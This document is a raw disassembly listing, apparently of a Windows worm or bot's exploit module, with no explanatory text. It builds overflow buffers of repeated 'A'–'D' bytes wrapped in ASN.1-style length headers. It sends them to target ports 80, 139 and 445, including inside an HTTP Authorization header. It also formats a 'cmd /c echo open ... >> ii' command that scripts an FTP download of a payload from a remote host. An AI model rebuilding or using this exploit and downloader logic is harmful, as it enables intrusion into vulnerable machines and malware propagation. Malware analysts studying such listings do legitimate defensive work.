dec ebx
and ebx, 0FFFFFFFEh
add ebx, 3
add eax, ebx
push eax
call sub_417B89
mov edi, eax
pop ecx
test edi, edi
jnz short loc_4038FF
loc_4038FB: ; CODE XREF: sub_4038CE+D�j
xor al, al
jmp short loc_403956
; ---------------------------------------------------------------------------
loc_4038FF: ; CODE XREF: sub_4038CE+2B�j
mov eax, ebx
add eax, [esi+4]
push eax
push 0
push edi
call sub_417330
add esp, 0Ch
cmp ebx, 1
jnz short loc_403924
mov al, [esi+4]
mov [edi], al
push dword ptr [esi+4]
lea eax, [edi+1]
push dword ptr [esi]
jmp short loc_40393E
; ---------------------------------------------------------------------------
loc_403924: ; CODE XREF: sub_4038CE+45�j
mov byte ptr [edi], 82h
mov eax, [esi+4]
sar eax, 8
mov [edi+1], al
mov al, [esi+4]
mov [edi+2], al
push dword ptr [esi+4]
lea eax, [edi+3]
push dword ptr [esi]
loc_40393E: ; CODE XREF: sub_4038CE+54�j
push eax
call sub_417390
add esp, 0Ch
push dword ptr [esi]
call sub_417C3B
add [esi+4], ebx
pop ecx
mov [esi], edi
mov al, 1
loc_403956: ; CODE XREF: sub_4038CE+2F�j
pop edi
pop esi
pop ebx
retn
sub_4038CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40395A proc near ; CODE XREF: sub_403A90+89�p
; sub_403A90+E3�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push edi
lea ecx, [ebp+var_8]
push dword ptr [esi+4]
push dword ptr [esi]
push 1
push offset dword_43C824
call sub_403860
lea ecx, [ebp+var_8]
call sub_4038CE
mov eax, [ebp+var_4]
inc eax
push eax
call sub_417B89
mov edi, eax
pop ecx
test edi, edi
jnz short loc_403994
xor al, al
jmp short loc_4039D0
; ---------------------------------------------------------------------------
loc_403994: ; CODE XREF: sub_40395A+34�j
mov eax, [ebp+var_4]
inc eax
push eax
push 0
push edi
call sub_417330
mov byte ptr [edi], 3
push [ebp+var_4]
lea eax, [edi+1]
push [ebp+var_8]
push eax
call sub_417390
add esp, 18h
mov ecx, esi
call sub_4038B5
mov eax, [ebp+var_4]
lea ecx, [ebp+var_8]
inc eax
mov [esi], edi
mov [esi+4], eax
call sub_4038B5
mov al, 1
loc_4039D0: ; CODE XREF: sub_40395A+38�j
pop edi
pop esi
leave
retn
sub_40395A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4039D4 proc near ; CODE XREF: sub_403A08+14�p
; sub_403A25+8�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push [ebp+arg_4]
lea ecx, [ebp+var_8]
push [ebp+arg_0]
push dword ptr [esi+4]
push dword ptr [esi]
call sub_403860
mov ecx, esi
call sub_4038B5
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
pop esi
leave
retn 8
sub_4039D4 endp
; =============== S U B R O U T I N E =======================================
sub_403A08 proc near ; CODE XREF: sub_403A90+F0�p
; sub_403A90+15B�p ...
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
call sub_417AB0
pop ecx
push eax
mov ecx, esi
push [esp+8+arg_0]
call sub_4039D4
pop esi
retn 4
sub_403A08 endp
; =============== S U B R O U T I N E =======================================
sub_403A25 proc near ; CODE XREF: sub_403A71+B�p
; sub_403A90+1A1�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_4039D4
retn 8
sub_403A25 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403A35 proc near ; CODE XREF: sub_403A71+16�p
; sub_403A90+91�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
call sub_4038CE
test al, al
jz short loc_403A6E
push dword ptr [esi+4]
lea ecx, [ebp+var_8]
push dword ptr [esi]
push 1
push (offset loc_4289A7+1)
call sub_403860
mov ecx, esi
call sub_4038B5
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
loc_403A6E: ; CODE XREF: sub_403A35+F�j
pop esi
leave
retn
sub_403A35 endp
; =============== S U B R O U T I N E =======================================
sub_403A71 proc near ; CODE XREF: sub_403A90+134�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_403A25
test al, al
jz short loc_403A8C
mov ecx, esi
call sub_403A35
loc_403A8C: ; CODE XREF: sub_403A71+12�j
pop esi
retn 8
sub_403A71 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403A90 proc near ; CODE XREF: _0:00404315�p
var_858 = byte ptr -858h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 858h
push ebx
push edi
lea ecx, [ebp+var_48]
call sub_40381C
mov edi, 408h
cmp [ebp+arg_8], edi
jg loc_403DE4
mov ebx, [ebp+arg_10]
lea eax, [ebx+8]
cmp eax, edi
ja loc_403DE4
push esi
lea ecx, [ebp+var_30]
call sub_40381C
lea ecx, [ebp+var_20]
call sub_40381C
lea ecx, [ebp+var_50]
call sub_40381C
lea ecx, [ebp+var_18]
call sub_40381C
lea ecx, [ebp+var_40]
call sub_40381C
lea ecx, [ebp+var_38]
call sub_40381C
lea ecx, [ebp+var_28]
call sub_40381C
push 4
push offset dword_428648
lea ecx, [ebp+var_30]
call sub_4039D4
push 3
push offset dword_428650
lea ecx, [ebp+var_30]
call sub_4039D4
lea ecx, [ebp+var_30]
call sub_40395A
lea ecx, [ebp+var_30]
call sub_403A35
mov esi, 800h
lea eax, [ebp+var_858]
push esi
push 42h
push eax
call sub_417330
add esp, 0Ch
lea ecx, [ebp+var_20]
push 8
push offset byte_42863C
call sub_4039D4
push ebx
lea ecx, [ebp+var_20]
push [ebp+arg_C]
call sub_4039D4
mov eax, 409h
lea ecx, [ebp+var_20]
sub eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_858]
push eax
call sub_4039D4
lea ecx, [ebp+var_20]
call sub_40395A
push offset loc_4289D0
lea ecx, [ebp+var_50]
call sub_403A08
lea ecx, [ebp+var_50]
call sub_40395A
push esi
lea eax, [ebp+var_858]
push 44h
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+var_858]
lea ecx, [ebp+var_58]
push 410h
push eax
call sub_403826
lea ecx, [ebp+var_58]
call sub_40395A
push [ebp+var_54]
lea ecx, [ebp+var_50]
push [ebp+var_58]
call sub_403A71
lea ecx, [ebp+var_58]
call sub_4038B5
push esi
lea eax, [ebp+var_858]
push 43h
push eax
call sub_417330
add esp, 0Ch
push offset aCccc ; "CCCC"
lea ecx, [ebp+var_18]
call sub_403A08
push 4
push offset dword_428654
lea ecx, [ebp+var_18]
call sub_4039D4
push [ebp+arg_8]
lea ecx, [ebp+var_18]
push [ebp+arg_4]
call sub_4039D4
sub edi, [ebp+arg_8]
lea eax, [ebp+var_858]
lea ecx, [ebp+var_18]
push edi
push eax
call sub_4039D4
lea ecx, [ebp+var_18]
call sub_40395A
push [ebp+var_14]
lea ecx, [ebp+var_40]
push [ebp+var_18]
call sub_403A25
push [ebp+var_4C]
lea ecx, [ebp+var_40]
push [ebp+var_50]
call sub_403A25
lea ecx, [ebp+var_40]
call sub_403A35
lea ecx, [ebp+var_18]
call sub_4038B5
lea ecx, [ebp+var_50]
call sub_4038B5
push [ebp+var_1C]
lea ecx, [ebp+var_38]
push [ebp+var_20]
call sub_403A25
push [ebp+var_2C]
lea ecx, [ebp+var_38]
push [ebp+var_30]
call sub_403A25
push [ebp+var_3C]
lea ecx, [ebp+var_38]
push [ebp+var_40]
call sub_403A25
lea ecx, [ebp+var_38]
call sub_403A35
lea ecx, [ebp+var_20]
call sub_4038B5
lea ecx, [ebp+var_30]
call sub_4038B5
lea ecx, [ebp+var_40]
call sub_4038B5
push esi
lea eax, [ebp+var_858]
push 41h
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+var_858]
lea ecx, [ebp+var_28]
push 400h
push eax
call sub_4039D4
lea ecx, [ebp+var_28]
call sub_40395A
push 2
push offset dword_4289C4
lea ecx, [ebp+var_28]
call sub_4039D4
push [ebp+var_34]
lea ecx, [ebp+var_28]
push [ebp+var_38]
call sub_403A25
lea ecx, [ebp+var_28]
call sub_403A35
lea ecx, [ebp+var_38]
call sub_4038B5
lea ecx, [ebp+var_10]
call sub_40381C
lea ecx, [ebp+var_8]
call sub_40381C
push [ebp+var_24]
lea ecx, [ebp+var_10]
push [ebp+var_28]
call sub_403A25
lea ecx, [ebp+var_10]
call sub_4038CE
lea ecx, [ebp+var_28]
call sub_4038B5
push offset dword_4289C0
lea ecx, [ebp+var_8]
call sub_403A08
push [ebp+var_C]
lea ecx, [ebp+var_8]
push [ebp+var_10]
call sub_403A25
lea ecx, [ebp+var_8]
call sub_4038CE
lea ecx, [ebp+var_10]
call sub_4038B5
push offset dword_4289BC
lea ecx, [ebp+var_10]
call sub_403A08
push [ebp+var_4]
lea ecx, [ebp+var_10]
push [ebp+var_8]
call sub_403A25
lea ecx, [ebp+var_10]
call sub_4038CE
lea ecx, [ebp+var_8]
call sub_4038B5
push offset dword_4289B0
lea ecx, [ebp+var_8]
call sub_403A08
push [ebp+var_C]
lea ecx, [ebp+var_8]
push [ebp+var_10]
call sub_403A25
lea ecx, [ebp+var_8]
call sub_4038CE
lea ecx, [ebp+var_10]
call sub_4038B5
push offset dword_4289AC
lea ecx, [ebp+var_48]
call sub_403A08
push [ebp+var_4]
lea ecx, [ebp+var_48]
push [ebp+var_8]
call sub_403A25
lea ecx, [ebp+var_8]
call sub_4038B5
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_48]
pop esi
mov [eax], ecx
mov ecx, [ebp+var_44]
mov [eax+4], ecx
jmp short loc_403DF2
; ---------------------------------------------------------------------------
loc_403DE4: ; CODE XREF: sub_403A90+1B�j
; sub_403A90+29�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_48]
mov [eax], ecx
mov ecx, [ebp+var_44]
mov [eax+4], ecx
loc_403DF2: ; CODE XREF: sub_403A90+352�j
pop edi
pop ebx
leave
retn
sub_403A90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403DF6 proc near ; CODE XREF: sub_403EBA+A1�p
; sub_403EBA+C2�p ...
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push esi
push edi
mov esi, [ebp+arg_0]
push 1
pop edi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_210]
and [ebp+var_4], 0
push eax
lea eax, [ebp+var_10C]
push 0
push eax
lea eax, [esi+1]
push eax
mov [ebp+var_108], esi
mov [ebp+var_10C], edi
mov [ebp+var_20C], esi
mov [ebp+var_210], edi
mov [ebp+var_8], 0Ah
call ds:dword_42420C ; select
cmp eax, edi
jnz short loc_403E5D
lea eax, [ebp+var_10C]
push eax
push esi
call sub_422A46 ; __WSAFDIsSet
test eax, eax
jnz short loc_403E61
loc_403E5D: ; CODE XREF: sub_403DF6+54�j
xor eax, eax
jmp short loc_403E71
; ---------------------------------------------------------------------------
loc_403E61: ; CODE XREF: sub_403DF6+65�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call ds:dword_43F680 ; recv
loc_403E71: ; CODE XREF: sub_403DF6+69�j
pop edi
pop esi
leave
retn
sub_403DF6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403E75 proc near ; CODE XREF: sub_403EBA+81�p
; sub_403EBA+AB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_8]
call ds:dword_43F664 ; htonl
mov [ebp+var_4], eax
push 0
lea eax, [ebp+var_4]
push 4
push eax
push [ebp+arg_0]
call ds:dword_43F6B8 ; send
cmp eax, 4
jz short loc_403E9F
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_403E9F: ; CODE XREF: sub_403E75+24�j
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_43F6B8 ; send
sub eax, [ebp+arg_8]
neg eax
sbb eax, eax
inc eax
leave
retn
sub_403E75 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403EBA proc near ; CODE XREF: sub_403F94+48�p
; _0:00404406�p
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 104h
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
lea ebx, [edi+41h]
push ebx
mov [ebp+var_4], ebx
call sub_417B89
mov esi, eax
pop ecx
test esi, esi
jnz short loc_403EE3
xor al, al
jmp loc_403F8F
; ---------------------------------------------------------------------------
loc_403EE3: ; CODE XREF: sub_403EBA+20�j
push ebx
push 0
push esi
call sub_417330
push 2Fh
push offset dword_4286E4
push esi
call sub_417390
push 8
lea eax, [esi+31h]
push offset dword_428714
push eax
mov [esi+2Fh], di
call sub_417390
push edi
lea ebx, [esi+3Bh]
push [ebp+arg_4]
mov [esi+39h], di
push ebx
call sub_417390
push 6
add ebx, edi
push offset dword_43C81C
push ebx
call sub_417390
mov ebx, [ebp+arg_0]
push 85h
push offset dword_42865C
push ebx
call sub_403E75
add esp, 48h
test al, al
jnz short loc_403F4B
loc_403F47: ; CODE XREF: sub_403EBA+B5�j
xor bl, bl
jmp short loc_403F86
; ---------------------------------------------------------------------------
loc_403F4B: ; CODE XREF: sub_403EBA+8B�j
mov edi, 100h
push 0
lea eax, [ebp+var_104]
push edi
push eax
push ebx
call sub_403DF6
push [ebp+var_4]
push esi
push ebx
call sub_403E75
add esp, 1Ch
test al, al
jz short loc_403F47
push 0
lea eax, [ebp+var_104]
push edi
push eax
push ebx
call sub_403DF6
add esp, 10h
mov bl, 1
loc_403F86: ; CODE XREF: sub_403EBA+8F�j
push esi
call sub_417C3B
pop ecx
mov al, bl
loc_403F8F: ; CODE XREF: sub_403EBA+24�j
pop edi
pop esi
pop ebx
leave
retn
sub_403EBA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403F94 proc near ; CODE XREF: _0:004043EC�p
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push 0
push 48h
push offset unk_428720
push [ebp+arg_0]
call ds:dword_424208 ; send
cmp eax, 48h
jnz short loc_403FCF
push 0
lea eax, [ebp+var_20]
push 20h
push eax
push [ebp+arg_0]
call sub_403DF6
add esp, 10h
cmp eax, 0FFFFFFFFh
jz short loc_403FCF
cmp [ebp+var_20], 82h
jz short loc_403FD3
loc_403FCF: ; CODE XREF: sub_403F94+1B�j
; sub_403F94+33�j
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_403FD3: ; CODE XREF: sub_403F94+39�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_403EBA
add esp, 0Ch
leave
retn
sub_403F94 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403FE6 proc near ; CODE XREF: sub_404032+2D�p
var_10 = qword ptr -10h
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
and dword ptr [ebp+var_8+4], 0
shl eax, 3
mov dword ptr [ebp+var_8], eax
fild [ebp+var_8]
fmul ds:dbl_424278
call sub_417DC4
and dword ptr [ebp+var_8+4], 0
mov dword ptr [ebp+var_8], eax
fild [ebp+var_8]
push ecx
push ecx ; double
fst [ebp+var_8]
fmul ds:dbl_424270
fstp [esp+10h+var_10]
call sub_417CA4
fadd st, st
pop ecx
pop ecx
fadd [ebp+var_8]
call sub_417DC4
inc eax
leave
retn
sub_403FE6 endp
; =============== S U B R O U T I N E =======================================
sub_404032 proc near ; CODE XREF: sub_4041D4+24�p
var_40 = qword ptr -40h
mov eax, offset loc_4230E7
call sub_418290
sub esp, 2Ch
mov al, [ebp+13h]
push ebx
push esi
push edi
xor edi, edi
lea ecx, [ebp-38h]
push edi
mov [ebp-20h], edi
mov [ebp-38h], al
call sub_404667
push 1
pop ebx
push dword ptr [ebp+10h]
mov [ebp-4], ebx
call sub_403FE6
cmp [ebp-2Ch], eax
pop ecx
jnb short loc_404074
push edi
push eax
lea ecx, [ebp-38h]
call sub_4045E2
loc_404074: ; CODE XREF: sub_404032+36�j
cmp [ebp+10h], edi
mov [ebp-18h], edi
jbe loc_404191
mov ebx, [ebp+10h]
loc_404083: ; CODE XREF: sub_404032+156�j
cmp dword ptr [ebp+10h], 3
jb short loc_40408D
push 3
jmp short loc_40409F
; ---------------------------------------------------------------------------
loc_40408D: ; CODE XREF: sub_404032+55�j
cmp dword ptr [ebp+10h], 2
jnz short loc_404097
push 2
jmp short loc_40409F
; ---------------------------------------------------------------------------
loc_404097: ; CODE XREF: sub_404032+5F�j
cmp dword ptr [ebp+10h], 1
jnz short loc_4040A0
push 1
loc_40409F: ; CODE XREF: sub_404032+59�j
; sub_404032+63�j
pop ebx
loc_4040A0: ; CODE XREF: sub_404032+69�j
mov [ebp-28h], ebx
mov [ebp-24h], edi
fild qword ptr [ebp-28h]
push ecx
push ecx ; double
fmul ds:dbl_424288
fstp [esp+40h+var_40]
call sub_417DEB
pop ecx
pop ecx
call sub_417DC4
cmp ebx, edi
mov [ebp-1Ch], eax
jbe short loc_4040DF
mov esi, [ebp+0Ch]
mov ecx, ebx
mov edx, ecx
lea edi, [ebp-10h]
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
xor edi, edi
loc_4040DF: ; CODE XREF: sub_404032+93�j
mov cl, [ebp-10h]
mov dl, [ebp-10h]
sar cl, 2
and cl, 3Fh
and dl, 3
mov [ebp-14h], cl
mov cl, [ebp-0Fh]
sar cl, 4
and cl, 0Fh
add [ebp+0Ch], ebx
shl dl, 4
add cl, dl
mov dl, [ebp-0Fh]
mov [ebp-13h], cl
mov cl, [ebp-0Eh]
sar cl, 6
and dl, 0Fh
sub [ebp+10h], ebx
and cl, 3
xor esi, esi
shl dl, 2
add cl, dl
mov [ebp-12h], cl
mov cl, [ebp-0Eh]
and cl, 3Fh
cmp eax, edi
mov [ebp-11h], cl
jbe short loc_40414D
add [ebp-18h], eax
loc_404131: ; CODE XREF: sub_404032+119�j
movsx eax, byte ptr [ebp+esi-14h]
lea ecx, [ebp-38h]
mov al, ds:byte_42876C[eax]
push eax
push 1
call sub_404464
inc esi
cmp esi, [ebp-1Ch]
jb short loc_404131
loc_40414D: ; CODE XREF: sub_404032+FA�j
cmp dword ptr [ebp-18h], 48h
jb short loc_40416B
push dword ptr [ebp+14h]
call sub_417AB0
pop ecx
push eax
lea ecx, [ebp-38h]
push dword ptr [ebp+14h]
call sub_4044BD
mov [ebp-18h], edi
loc_40416B: ; CODE XREF: sub_404032+11F�j
push 4
pop esi
cmp [ebp-1Ch], esi
jnb short loc_404185
sub esi, [ebp-1Ch]
loc_404176: ; CODE XREF: sub_404032+151�j
push 3Dh
push 1
lea ecx, [ebp-38h]
call sub_404464
dec esi
jnz short loc_404176
loc_404185: ; CODE XREF: sub_404032+13F�j
cmp [ebp+10h], edi
ja loc_404083
push 1
pop ebx
loc_404191: ; CODE XREF: sub_404032+48�j
mov esi, [ebp+8]
mov al, [ebp-38h]
push edi
mov ecx, esi
mov [esi], al
call sub_404667
push ds:dword_424280
lea eax, [ebp-38h]
mov ecx, esi
push edi
push eax
call sub_404514
mov [ebp-20h], ebx
and byte ptr [ebp-4], 0
push ebx
lea ecx, [ebp-38h]
call sub_404667
mov ecx, [ebp-0Ch]
mov eax, esi
pop edi
pop esi
pop ebx
mov large fs:0, ecx
leave
retn
sub_404032 endp
; =============== S U B R O U T I N E =======================================
sub_4041D4 proc near ; CODE XREF: _0:004043CF�p
mov eax, offset loc_423104
call sub_418290
sub esp, 10h
push ebx
push esi
push edi
push offset byte_43C80C
lea eax, [ebp-1Ch]
push dword ptr [ebp+10h]
xor ebx, ebx
mov [ebp-4], ebx
push dword ptr [ebp+0Ch]
push eax
call sub_404032
mov eax, [ebp+1Ch]
mov ecx, [ebp-14h]
mov byte ptr [ebp-4], 1
lea esi, [ecx+eax+36h]
push esi
call sub_417B89
mov edi, eax
add esp, 14h
cmp edi, ebx
jnz short loc_40421E
xor bl, bl
jmp short loc_404262
; ---------------------------------------------------------------------------
loc_40421E: ; CODE XREF: sub_4041D4+44�j
mov ecx, [ebp-18h]
mov eax, offset dword_424290
cmp ecx, ebx
jnz short loc_40422C
mov ecx, eax
loc_40422C: ; CODE XREF: sub_4041D4+54�j
cmp [ebp+18h], ebx
jz short loc_404234
mov eax, [ebp+18h]
loc_404234: ; CODE XREF: sub_4041D4+5B�j
push ecx
push eax
push offset aGetHttp1_0Host ; "GET / HTTP/1.0\r\nHost: %s\r\nAuthorization"...
push esi
push edi
call sub_41782A
add esp, 14h
push ebx
push esi
push edi
push dword ptr [ebp+8]
call ds:dword_43F6B8 ; send
cmp eax, esi
jz short loc_404259
xor bl, bl
jmp short loc_40425B
; ---------------------------------------------------------------------------
loc_404259: ; CODE XREF: sub_4041D4+7F�j
mov bl, 1
loc_40425B: ; CODE XREF: sub_4041D4+83�j
push edi
call sub_417C3B
pop ecx
loc_404262: ; CODE XREF: sub_4041D4+48�j
and byte ptr [ebp-4], 0
push 1
lea ecx, [ebp-1Ch]
call sub_404667
or dword ptr [ebp-4], 0FFFFFFFFh
push 1
lea ecx, [ebp+14h]
call sub_404667
mov ecx, [ebp-0Ch]
pop edi
mov al, bl
pop esi
pop ebx
mov large fs:0, ecx
leave
retn
sub_4041D4 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 420h
and byte ptr [ebp-420h], 0
push ebx
push esi
push edi
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp-41Fh]
push 8Fh
rep stosd
stosw
stosb
lea eax, [ebp-420h]
push offset sub_428918
push eax
call sub_417390
add esp, 0Ch
mov eax, offset byte_42F678
push eax
push eax
push ds:dword_43C83C
push dword ptr [ebp+8]
call sub_40AEE0
pop ecx
push eax
push offset aCmdCEchoOpenSD ; "cmd /c echo open %s %d >> ii &echo user"...
lea eax, [ebp-391h]
push 400h
push eax
call sub_41782A
add eax, 90h
push eax
lea eax, [ebp-420h]
push eax
push 164h
lea eax, [ebp-8]
push offset sub_4287B0
push eax
call sub_403A90
xor esi, esi
add esp, 30h
cmp [ebp-4], esi
jnz short loc_40432B
xor eax, eax
jmp loc_404457
; ---------------------------------------------------------------------------
loc_40432B: ; CODE XREF: _0:00404322�j
mov [ebp-0Ch], esi
loc_40432E: ; CODE XREF: _0:0040442E�j
test esi, esi
jnz loc_404434
push 6
push 1
push 2
call ds:dword_424214 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_40441C
xor eax, eax
lea edi, [ebp-1Ah]
stosd
push dword ptr [ebp+0A8h]
stosd
stosd
stosw
mov word ptr [ebp-1Ch], 2
call ds:dword_43F668 ; htons
mov [ebp-1Ah], ax
lea eax, [ebp+0Ch]
push eax
call ds:dword_43F6A8 ; inet_addr
mov [ebp-18h], eax
lea eax, [ebp-1Ch]
push 10h
push eax
push ebx
call ds:dword_43F610 ; connect
cmp eax, 0FFFFFFFFh
jz loc_404411
cmp dword ptr [ebp+0A8h], 50h
jnz short loc_4043D9
mov al, [ebp+0C3h]
sub esp, 10h
mov esi, esp
mov [ebp-20h], esp
push 0
mov ecx, esi
mov [esi], al
call sub_404667
lea eax, [ebp+0Ch]
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+0Ch]
push eax
mov ecx, esi
call sub_4046A3
push dword ptr [ebp-4]
push dword ptr [ebp-8]
push ebx
call sub_4041D4
add esp, 1Ch
jmp short loc_40440E
; ---------------------------------------------------------------------------
loc_4043D9: ; CODE XREF: _0:00404397�j
cmp dword ptr [ebp+0A8h], 8Bh
jnz short loc_4043F3
push dword ptr [ebp-4]
push dword ptr [ebp-8]
push ebx
call sub_403F94
jmp short loc_40440B
; ---------------------------------------------------------------------------
loc_4043F3: ; CODE XREF: _0:004043E3�j
cmp dword ptr [ebp+0A8h], 1BDh
jnz short loc_404411
push dword ptr [ebp-4]
push dword ptr [ebp-8]
push ebx
call sub_403EBA
loc_40440B: ; CODE XREF: _0:004043F1�j
add esp, 0Ch
loc_40440E: ; CODE XREF: _0:004043D7�j
movzx esi, al
loc_404411: ; CODE XREF: _0:0040438A�j _0:004043FD�j
push ebx
call ds:dword_43F700 ; closesocket
test esi, esi
jnz short loc_404427
loc_40441C: ; CODE XREF: _0:00404347�j
push 3E8h
call ds:dword_424064 ; Sleep
loc_404427: ; CODE XREF: _0:0040441A�j
inc dword ptr [ebp-0Ch]
cmp dword ptr [ebp-0Ch], 2
jl loc_40432E
loc_404434: ; CODE XREF: _0:00404330�j
lea ecx, [ebp-8]
call sub_4038B5
test esi, esi
jz short loc_404455
mov eax, [ebp+0B0h]
imul eax, 3Ch
inc ds:dword_42ACB8[eax]
lea eax, dword_42ACB8[eax]
loc_404455: ; CODE XREF: _0:0040443E�j
mov eax, esi
loc_404457: ; CODE XREF: _0:00404326�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4230C8
loc_40445C: ; CODE XREF: sub_4230C8+3�j
; _0:004230E1�j ...
push 1
call sub_404667
retn
; END OF FUNCTION CHUNK FOR sub_4230C8
; =============== S U B R O U T I N E =======================================
sub_404464 proc near ; CODE XREF: sub_404032+110�p
; sub_404032+14B�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
mov eax, ds:dword_424280
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, ecx
push edi
sub eax, [esi+8]
cmp eax, ebx
ja short loc_40447E
call sub_42298A
loc_40447E: ; CODE XREF: sub_404464+13�j
test ebx, ebx
jbe short loc_4044B5
mov edi, ebx
push 0
add edi, [esi+8]
mov ecx, esi
push edi
call sub_4045E2
test al, al
jz short loc_4044B5
movsx eax, [esp+0Ch+arg_4]
push ebx
push eax
mov eax, [esi+4]
add eax, [esi+8]
push eax
call sub_417330
mov eax, [esi+4]
add esp, 0Ch
mov [esi+8], edi
and byte ptr [eax+edi], 0
loc_4044B5: ; CODE XREF: sub_404464+1C�j
; sub_404464+2F�j
mov eax, esi
pop edi
pop esi
pop ebx
retn 8
sub_404464 endp
; =============== S U B R O U T I N E =======================================
sub_4044BD proc near ; CODE XREF: sub_404032+131�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, ds:dword_424280
push ebx
mov ebx, [esp+4+arg_4]
push esi
mov esi, ecx
push edi
sub eax, [esi+8]
cmp eax, ebx
ja short loc_4044D7
call sub_42298A
loc_4044D7: ; CODE XREF: sub_4044BD+13�j
test ebx, ebx
jbe short loc_40450C
mov edi, ebx
push 0
add edi, [esi+8]
mov ecx, esi
push edi
call sub_4045E2
test al, al
jz short loc_40450C
mov eax, [esi+8]
push ebx
push [esp+10h+arg_0]
add eax, [esi+4]
push eax
call sub_417390
mov eax, [esi+4]
add esp, 0Ch
mov [esi+8], edi
and byte ptr [edi+eax], 0
loc_40450C: ; CODE XREF: sub_4044BD+1C�j
; sub_4044BD+2F�j
mov eax, esi
pop edi
pop esi
pop ebx
retn 8
sub_4044BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404514 proc near ; CODE XREF: sub_404032+17C�p
; sub_4228A0+15�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
mov edi, ecx
cmp [ebx+8], eax
jnb short loc_40452C
call sub_422863
loc_40452C: ; CODE XREF: sub_404514+11�j
mov eax, [ebx+8]
mov ecx, [ebp+arg_4]
mov esi, eax
sub esi, ecx
cmp [ebp+arg_8], esi
jnb short loc_40453E
mov esi, [ebp+arg_8]
loc_40453E: ; CODE XREF: sub_404514+25�j
cmp edi, ebx
jnz short loc_404560
push ds:dword_424280
add esi, ecx
mov ecx, edi
push esi
call sub_4046D8
push [ebp+arg_4]
mov ecx, edi
push 0
call sub_4046D8
jmp short loc_4045D9
; ---------------------------------------------------------------------------
